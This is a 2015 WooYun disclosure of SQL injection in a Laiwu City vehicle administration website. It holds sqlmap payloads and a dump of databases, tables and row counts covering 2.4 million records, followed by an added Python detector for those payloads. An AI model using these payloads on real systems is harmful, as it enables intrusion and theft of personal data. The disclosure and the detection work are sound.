Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0163485

Vulnerability title: SQL injection in the Laiwu City (Shandong Province) online vehicle administration office site exposes 2.4 million detailed records and a large number of administrator plaintext passwords

Affected vendor: Laiwu City online vehicle administration office (Shandong Province)

Vulnerability author: 路人甲

Submitted: 2015-12-22 15:16

Fixed: 2016-02-07 17:56

Disclosed: 2016-02-07 17:56

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 16

Status: handed to a third-party partner organization (Ministry of Public Security First Research Institute) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-12-22: details sent to the vendor, awaiting vendor handling
2015-12-25: vendor confirmed; details disclosed to the vendor only
2016-01-04: details disclosed to core white hats and relevant domain experts
2016-01-14: details disclosed to regular white hats
2016-01-24: details disclosed to intern white hats
2016-02-07: details disclosed to the public

Brief description:

SQL injection in the Laiwu City (Shandong Province) online vehicle administration office site exposes 2.4 million detailed records and a large number of administrator plaintext passwords

Details:

Found one injection point. There is far too much data: 2.4 million records including people's detailed personal information, a large number of administrator plaintext passwords and so on, so I did not dump them one by one....
Injection point: **.**.**.**:9080/wscgs/xwl.do?smid=18&bgid=02&bj=8
**.**.**.**:9080/wscgs/xwl.do?smid=18
the SQL query used returns 2402024 entries

sqlmap identified the following injection point(s) with a total of 58 HTTP(s) requests:
---
Parameter: smid (GET)
Type: boolean-based blind
Title: Oracle boolean-based blind - Parameter replace
Payload: smid=(SELECT (CASE WHEN (8442=8442) THEN 8442 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: smid=18 AND 3236=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(98)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (3236=3236) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(113)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL)
---
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: smid (GET)
Type: boolean-based blind
Title: Oracle boolean-based blind - Parameter replace
Payload: smid=(SELECT (CASE WHEN (8442=8442) THEN 8442 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: smid=18 AND 3236=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(98)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (3236=3236) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(113)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL)
---
web application technology: JSP
back-end DBMS: Oracle
the SQL query used returns 2402024 entries
web application technology: JSP
back-end DBMS: Oracle
available databases [34]:
[*] CTXSYS
[*] DRV_ADMIN
[*] DRV_HEALTH
[*] HR
[*] LWTJ
[*] LWZXSL
[*] MDSYS
[*] NET
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] QSWEBCGS_USER
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] VEH_ADMIN
[*] VIO_ADMIN
[*] WKSYS
[*] WMS_USER
[*] WMSYS
[*] WSCGS
[*] XDB
Database: QSWEBCGS_USER
[151 tables]
+----------------------------+
| ALL_TAB |
| CODE |
| CODETYPE |
| DRIVINGLICENSE_TB |
| DRV_EXAMCARD_TB |
| DRV_EXAMINATION_SITE_TB |
| DRV_FLOW_TB |
| DRV_LEARNER_VEHICLE_TB |
| DRV_POINTRESET |
| DRV_PREASIGN_TB |
| DRV_SCHOOLINFO_TB |
| DRV_TRAININGRECORDS_BF |
| DRV_TRAININGRECORDS_TB |
| KSBM_BM |
| KSBM_BMRZ |
| KSBM_CODE |
| KSBM_GLBM |
| KSBM_IPCSXZ |
| KSBM_JLC |
| KSBM_JX |
| KSBM_JXJLY |
| KSBM_JXPM |
| KSBM_KSYY |
| KSBM_LLS |
| KSBM_QXBM |
| KSBM_TS |
| KSBM_USER |
| KSBM_XZQH |
| KSBM_YHQX |
| KSBM_YWLX |
| LOGS |
| MFXX_FLOW |
| MFXX_LEARN_INFO |
| MFXX_RECORD |
| SDGA_EXAMPXJL |
| SYS_LOG |
| SYS_LOG_PRO |
| SYS_MANAGER |
| SYS_PARA |
| SYS_USER |
| SYS_USER_ONLINE |
| TAB_COLS |
| VEHICLE_TB |
| VEHICLE_TEMP_TB |
| VEH_FLOW_TB |
| VIO_FINE_TB |
| VIO_SURVEIL_TB |
| VIO_VIOLATION_TB |
| WSCGS_BQ |
| WSCGS_CODE |
| WSCGS_CODERQ |
| WSCGS_CODETYPE |
| WSCGS_CODEWFDM |
| WSCGS_CSSZ |
| WSCGS_FWL |
| WSCGS_GGDRV |
| WSCGS_GGH |
| WSCGS_GGVEH |
| WSCGS_HPZY_SUPPLY |
| WSCGS_JCXYY_BLACKLIST |
| WSCGS_JCXYY_JCXDD |
| WSCGS_JCXYY_PCSZ |
| WSCGS_JCXYY_PREASIGN |
| WSCGS_JCXYY_RZ |
| WSCGS_JCXYY_SJD |
| WSCGS_JCXYY_TZTG |
| WSCGS_JCXYY_USER |
| WSCGS_JKCSSZ |
| WSCGS_JSRZJ_DRV |
| WSCGS_JSRZJ_DWUSER |
| WSCGS_JSRZJ_HTUSER |
| WSCGS_JSRZJ_IDANDDWDH |
| WSCGS_JSRZJ_NEWS |
| WSCGS_JSRZJ_TZTG |
| WSCGS_JSRZJ_VEH |
| WSCGS_JSZJ_PERSON |
| WSCGS_JXPM |
| WSCGS_JXPMH |
| WSCGS_JXPMH_TB |
| WSCGS_JXPM_TB |
| WSCGS_KSYY_DRV_PREASIGN |
| WSCGS_KSYY_DRV_PREASIGN_TB |
| WSCGS_KSYY_FEEGATE |
| WSCGS_KSYY_JXRSSZ |
| WSCGS_KSYY_JXRSSZ_TB |
| WSCGS_KSYY_KCLX |
| WSCGS_KSYY_KSPC |
| WSCGS_KSYY_KSPC_TB |
| WSCGS_KSYY_PXINFOGATE |
| WSCGS_KSYY_PXINFOGATE_TB |
| WSCGS_KSYY_PXJLXX |
| WSCGS_KSYY_RZ |
| WSCGS_KSYY_USER |
| WSCGS_KSYY_USER_TB |
| WSCGS_KSYY_YYJG |
| WSCGS_LY |
| WSCGS_MAP |
| WSCGS_NEWS |
| WSCGS_QQXX |
| WSCGS_REGUSER |
| WSCGS_RIGHT |
| WSCGS_SXFW |
| WSCGS_TJBLYW |
| WSCGS_TJBLYW_TB |
| WSCGS_TJLY_TB |
| WSCGS_USERS |
| WSCGS_WBXX |
| WSCGS_XHBEFORE |
| WSCGS_XHBEFORE_COPY |
| WSCGS_XHBEFORE_TB |
| WSCGS_XHHPHD |
| WSCGS_XHHPZY |
| WSCGS_XHHPZYBY |
| WSCGS_XHHPZY_TB |
| WSCGS_XHIPHMD |
| WSCGS_XHJKDZ |
| WSCGS_XHKXHD |
| WSCGS_XHKXHD_TB |
| WSCGS_XHPROERR |
| WSCGS_XHPRO_SECURITY |
| WSCGS_XHPRO_SECURITY_COPY |
| WSCGS_XHPRO_STEP |
| WSCGS_XHRZ |
| WSCGS_XHSYSINFO |
| WSCGS_XHSYSINFO_TB |
| WSCGS_XHUSER |
| WSCGS_XHXD |
| WSCGS_XHXD_TB |
| WSCGS_XXBG_CODE |
| WSCGS_XXBG_GLBM |
| WSCGS_XXBG_JDCXX |
| WSCGS_XXBG_JDCXXBGRZ |
| WSCGS_XXBG_JDCXX_TB |
| WSCGS_XXBG_JSRXX |
| WSCGS_XXBG_JSRXXBGRZ |
| WSCGS_XXBG_JSRXX_TB |
| WSCGS_XXBG_PERSON |
| WSCGS_XXBG_USER |
| WSCGS_XXBG_YHJB |
| WSCGS_XXBG_YHXQ |
| WSCGS_XXCX_USER |
| WSCGS_YQLJ |
| WSCGS_ZXYW_LSHP |
| WSCGS_ZXYW_LSHPZP |
| WSCGS_ZXYW_PLATECLRZ |
| WSCGS_ZXYW_PLATEDRV |
| WSCGS_ZXYW_PLATEVEH |
| WSCGS_ZXYW_PLATEZP |
| WSCGS_ZXYW_USER |
| WSCGS_ZXYW_WTJY |
| WSCGS_ZXYW_WTJYZP |
+----------------------------+

[Screenshots 2.png to 5.png omitted]

Proof of vulnerability:

the SQL query used returns 2402024 entries
Database: QSWEBCGS_USER
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| WSCGS_XHRZ | 2402024 |
| SYS_LOG_PRO | 1091760 |
| WSCGS_XHPRO_SECURITY | 253322 |
| SDGA_EXAMPXJL | 167522 |
| LOGS | 38583 |
| WSCGS_KSYY_DRV_PREASIGN | 30241 |
| SYS_LOG | 18617 |
| WSCGS_XHXD | 17961 |
| WSCGS_XHHPZY | 9146 |
| WSCGS_XHBEFORE_COPY | 6398 |
| WSCGS_LY | 2854 |
| WSCGS_KSYY_RZ | 1791 |
| WSCGS_JCXYY_PCSZ | 1230 |
| WSCGS_CODEWFDM | 779 |
| WSCGS_REGUSER | 730 |
| TAB_COLS | 605 |
| WSCGS_KSYY_JXRSSZ | 526 |
| WSCGS_NEWS | 480 |
| WSCGS_CODE | 409 |
| WSCGS_XHBEFORE | 365 |
| WSCGS_KSYY_KSPC | 311 |
| WSCGS_JSZJ_PERSON | 210 |
| WSCGS_XXBG_JSRXX | 125 |
| WSCGS_XXBG_JDCXX | 91 |
| WSCGS_ZXYW_PLATEZP | 90 |
| CODE | 66 |
| WSCGS_CODETYPE | 66 |
| WSCGS_CODERQ | 64 |
| WSCGS_ZXYW_WTJYZP | 63 |
| SYS_USER | 58 |
| MFXX_FLOW | 54 |
| WSCGS_RIGHT | 49 |
| WSCGS_ZXYW_WTJY | 31 |
| ALL_TAB | 30 |
| CODETYPE | 18 |
| WSCGS_KSYY_USER | 12 |
| WSCGS_XHPROERR | 12 |
| WSCGS_ZXYW_PLATEDRV | 12 |
| WSCGS_ZXYW_PLATEVEH | 9 |
| KSBM_YHQX | 8 |
| WSCGS_JCXYY_SJD | 8 |
| WSCGS_JCXYY_PREASIGN | 7 |
| WSCGS_XHKXHD | 7 |
| WSCGS_XXBG_YHXQ | 7 |
| WSCGS_XXBG_CODE | 5 |
| KSBM_CODE | 4 |
| WSCGS_JCXYY_USER | 4 |
| WSCGS_KSYY_FEEGATE | 4 |
| WSCGS_KSYY_PXINFOGATE | 4 |
| WSCGS_KSYY_YYJG | 4 |
| WSCGS_JCXYY_JCXDD | 3 |
| WSCGS_XHPRO_STEP | 3 |
| WSCGS_JCXYY_RZ | 2 |
| WSCGS_SXFW | 2 |
| WSCGS_USERS | 2 |
| WSCGS_WBXX | 2 |
| WSCGS_XXBG_YHJB | 2 |
| WSCGS_YQLJ | 2 |
| KSBM_GLBM | 1 |
| KSBM_USER | 1 |
| SYS_MANAGER | 1 |
| WSCGS_BQ | 1 |
| WSCGS_CSSZ | 1 |
| WSCGS_FWL | 1 |
| WSCGS_JKCSSZ | 1 |
| WSCGS_JSRZJ_HTUSER | 1 |
| WSCGS_XHJKDZ | 1 |
| WSCGS_XHSYSINFO | 1 |
| WSCGS_XHUSER | 1 |
| WSCGS_XXBG_GLBM | 1 |
| WSCGS_XXBG_USER | 1 |
| WSCGS_XXCX_USER | 1 |
| WSCGS_ZXYW_USER | 1 |
+-------------------------+---------+
Database: QSWEBCGS_USER
Table: WSCGS_XHRZ
[13 columns]
+--------+----------+
| Column | Type |
+--------+----------+
| BLSJ | DATE |
| BZ1 | VARCHAR2 |
| BZ2 | VARCHAR2 |
| CLSBDH | VARCHAR2 |
| CZBZ | VARCHAR2 |
| GLBM | VARCHAR2 |
| HPHM | VARCHAR2 |
| HPZL | VARCHAR2 |
| IP | VARCHAR2 |
| SFCG | VARCHAR2 |
| SID | VARCHAR2 |
| YWLX | VARCHAR2 |
| YZM | VARCHAR2 |
+--------+----------+

[Screenshots 6.png, 7.png, 8.png and 31.png omitted]

Remediation:

Fix it.

Copyright notice: please credit the source when republishing: 路人甲@乌云


Vendor response

Vendor response:

Severity: Medium

Vulnerability rank: 8

Confirmed: 2015-12-25 16:01

Vendor reply:

Thanks for the submission!!
Verified and confirmed the described issue; the owner has been notified to fix it.

Latest status:

None yet
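As an added defender-side example (not code from the original report or from the affected site): a small Python detector that decodes request query strings from web-server access logs, applies a numeric allow-list to the vulnerable smid parameter, and flags the two Oracle payload shapes sqlmap reported above (CASE WHEN ... FROM DUAL boolean-based blind, and XMLType error-based with CHR() concatenation). The log lines and client IP are constructed; the request path, parameter names and payload shapes come from the report.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Signatures distilled from the two sqlmap payloads shown in this report.
# They are matched against the percent-decoded parameter value.
ORACLE_SQLI_SIGNATURES = [
    ("blind-case-when", re.compile(r"\bCASE\s+WHEN\b.*\bFROM\s+DUAL\b", re.I | re.S)),
    ("xmltype-error-based", re.compile(r"\bXMLTYPE\s*\(", re.I)),
    ("chr-concat", re.compile(r"\bCHR\s*\(\s*\d+\s*\)\s*\|\|", re.I)),
    ("select-from-dual", re.compile(r"\bSELECT\b.*\bFROM\s+DUAL\b", re.I | re.S)),
]

def smid_is_valid(value):
    """Allow-list for the vulnerable parameter: the legitimate request in the
    report uses smid=18, so a short positive integer is the expected shape."""
    return value.isdigit() and 0 < int(value) < 10000

def classify_request(url):
    """Findings for one request URL as (param, label) pairs; empty if clean."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)  # percent-decodes
    findings = []
    for name, values in params.items():
        for value in values:
            if name == "smid" and not smid_is_valid(value):
                findings.append((name, "smid-not-integer"))
            for label, pattern in ORACLE_SQLI_SIGNATURES:
                if pattern.search(value):
                    findings.append((name, label))
                    break  # one signature per value is enough to alert
    return findings

LOG_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def scan_log(text):
    """Return [(line_no, findings)] for every access-log line that trips a check."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LOG_LINE.search(line)
        if m and (f := classify_request(m.group(1))):
            hits.append((n, f))
    return hits

# Constructed sample log (documentation-range client IP; request path from the
# report; payloads URL-encoded the way a browser or sqlmap would send them).
SAMPLE_LOG = (
    '203.0.113.5 - - [22/Dec/2015:15:10:01 +0800] "GET /wscgs/xwl.do?smid=18&bgid=02&bj=8 HTTP/1.1" 200 5120\n'
    '203.0.113.5 - - [22/Dec/2015:15:10:02 +0800] "GET /wscgs/xwl.do?smid=18%20AND%203236%3D(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)))%20FROM%20DUAL) HTTP/1.1" 500 312\n'
    '203.0.113.5 - - [22/Dec/2015:15:10:03 +0800] "GET /wscgs/xwl.do?smid=(SELECT%20(CASE%20WHEN%20(8442%3D8442)%20THEN%208442%20ELSE%20CAST(1%20AS%20INT)%2F(SELECT%200%20FROM%20DUAL)%20END)%20FROM%20DUAL) HTTP/1.1" 200 5120\n'
)
```

Running scan_log(SAMPLE_LOG) reports lines 2 and 3 and leaves the legitimate smid=18 request alone; the same allow-list check, applied server-side before the value reaches the query, is the actual fix.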